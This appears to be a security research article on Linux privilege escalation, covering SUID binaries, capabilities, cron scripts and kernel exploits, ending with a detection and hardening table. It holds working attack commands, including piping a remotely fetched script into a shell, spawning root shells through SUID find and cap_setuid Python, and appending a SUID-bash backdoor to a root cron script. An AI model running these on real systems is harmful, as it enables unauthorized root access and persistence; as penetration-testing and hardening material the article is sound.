Linux Privilege Escalation: Exploiting Misconfigurations in Production Environments
Systematic approach to identifying and exploiting common Linux privilege escalation vectors including SUID binaries, capabilities, and cron misconfigurations.
Methodology
Effective privilege escalation on Linux follows an enumerate-then-exploit workflow. Automated tools accelerate discovery, but manual validation prevents false positives from noisy output.
Initial Enumeration
#!/bin/bash
# Quick privilege escalation checks
id
sudo -l 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab 2>/dev/null
ls -la /etc/cron.* 2>/dev/null
Tools like LinPEAS and Linux Exploit Suggester complement manual checks:
curl -L linpeas.sh | sh
# Or run from local copy in restricted environments
./linpeas.sh -a
SUID Binary Abuse
World-writable SUID binaries are rare but critical findings:
find / -perm -4000 -type f 2>/dev/null | xargs ls -la
Example: find with SUID bit allows shell escape:
find . -exec /bin/sh -p \; -quit
Reference GTFOBins for binary-specific techniques.
Linux Capabilities
Capabilities provide granular privileges without full root:
getcap -r / 2>/dev/null
# Example output:
# /usr/bin/python3.8 = cap_setuid+ep
Python with cap_setuid enables immediate root:
import os
os.setuid(0)
os.system("/bin/bash")
Cron Job Misconfigurations
Writable cron scripts running as root:
# Find world-writable cron entries
find /etc/cron* -type f -perm -o+w 2>/dev/null
ls -la /var/spool/cron/crontabs/
If /opt/backup/backup.sh is writable and runs as root via cron:
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /opt/backup/backup.sh
# Wait for cron execution, then:
/tmp/rootbash -p
Kernel Exploits
Always verify kernel version before attempting exploits:
uname -a
cat /proc/version
searchsploit linux kernel $(uname -r)
Note: Kernel exploits should be last resort — they risk system instability and are easily detected.
Detection & Hardening
| Vector | Detection | Mitigation |
|---|---|---|
| SUID | Auditd on SUID execution | Remove unnecessary SUID bits |
| Capabilities | Monitor setuid syscalls | Drop capabilities with setcap -r |
| Cron | File integrity monitoring | Restrict write permissions |
Writable /etc/passwd | FIM alerts | Proper file permissions |
References
Share this research
Related Research
Windows Token Abuse: SeImpersonatePrivilege and Potato Variants
Analyzing how Windows access tokens enable local privilege escalation through SeImpersonatePrivilege abuse and modern Potato-family exploits.